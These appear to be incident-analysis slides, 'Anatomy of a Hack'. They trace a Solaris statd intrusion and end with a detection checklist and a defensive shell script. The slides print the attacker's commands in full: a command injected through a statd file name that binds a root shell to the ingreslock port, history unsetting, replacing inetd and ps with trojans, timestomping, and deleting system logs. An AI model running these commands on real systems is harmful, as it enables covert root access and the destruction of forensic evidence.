Anatomy of a Hack...

statd[146]: statd: attempt to create "/var/statmon/sm/; echo "ingreslock
stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s
/tmp/bob &"
• Create a second inetd.conf file with a root shell service on the ingreslock port.
• Start a second copy of inetd with that conf file to allow later connections.
• Then what…
Phase 2 - back doors
unset HISTFILE; unset SAVEHIST
cp doc /usr/sbin/inetd;
chown root /usr/sbin/inetd;
chgrp root /usr/sbin/inetd;
touch 0716000097 /usr/sbin/inetd;
rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd;
/usr/sbin/inetd -s;
/usr/sbin/inetd -s;
telnet localhost;
/usr/sbin/inetd -s;
ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
./boo
rm -rf boo
Phase 2 Continued
mkdir /usr/man/tmp
mv update ps /usr/man/tmp
cd /usr/man/tmp
echo 1 \"./update -s -o output\" > /kernel/pssys
chmod 755 ps update
./update -s -o output &
cp ps /usr/ucb/ps
mv ps /usr/bin/ps
touch 0716000097 /usr/bin/ps /usr/ucb/ps
cd /
ps -ef | grep bob | grep -v grep
ps -ef | grep stat | grep -v grep
ps -ef | grep update
Detection
• Several copies of inetd running
• /kernel/pssys exists
• /usr/bin/ps and /usr/ucb/ps same size.
• /usr/man/tmp/[update|output] exist
• Log messages from first slide
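
The indicators in this list can be checked with a short script. This is an added example, not part of the original slides; the function names, the ROOT and LOGFILE arguments, and the "PID COMMAND ARGS" process listing format are assumptions.

```shell
#!/bin/sh
# Added example (function names are hypothetical): checks the Detection slide's
# indicators. Run it with trusted binaries from read-only media; the slides show
# ps being replaced and /var/adm/messages deleted on the compromised host.

# Print one line per file indicator found under root $1 ("" = live system).
check_files() {
    root=$1
    [ -e "$root/kernel/pssys" ] && echo "FOUND: /kernel/pssys exists"
    for f in update output; do
        [ -e "$root/usr/man/tmp/$f" ] && echo "FOUND: /usr/man/tmp/$f exists"
    done
    a=$root/usr/bin/ps; b=$root/usr/ucb/ps
    if [ -f "$a" ] && [ -f "$b" ]; then
        sa=$(wc -c < "$a" | tr -d ' '); sb=$(wc -c < "$b" | tr -d ' ')
        [ "$sa" -eq "$sb" ] && echo "FOUND: both ps binaries are $sa bytes"
    fi
    return 0
}

# Count inetd processes in "PID COMMAND ARGS" lines read from stdin.
count_inetd() {
    awk '$2 ~ /(^|\/)inetd$/ { n++ } END { print n + 0 }'
}

# Count statd "attempt to create" log lines containing shell metacharacters.
count_statd_hits() {
    [ -r "$1" ] || { echo 0; return 0; }
    grep -c 'statd.*attempt to create.*[;&|]' "$1" || true
}

# Usage: sh check.sh ROOT [LOGFILE]   ROOT is "/" or a mounted image; LOGFILE
# can be a copy kept on a remote syslog host. The process check always
# reflects the machine the script runs on, not a mounted image.
main() {
    root=${1%/}
    check_files "$root"
    n=$(ps -e -o pid= -o args= | count_inetd)
    [ "$n" -gt 1 ] && echo "FOUND: $n copies of inetd running"
    h=$(count_statd_hits "${2:-$root/var/adm/messages}")
    [ "$h" -gt 0 ] && echo "FOUND: $h suspicious statd log lines"
    return 0
}
if [ "$#" -gt 0 ]; then main "$@"; fi
```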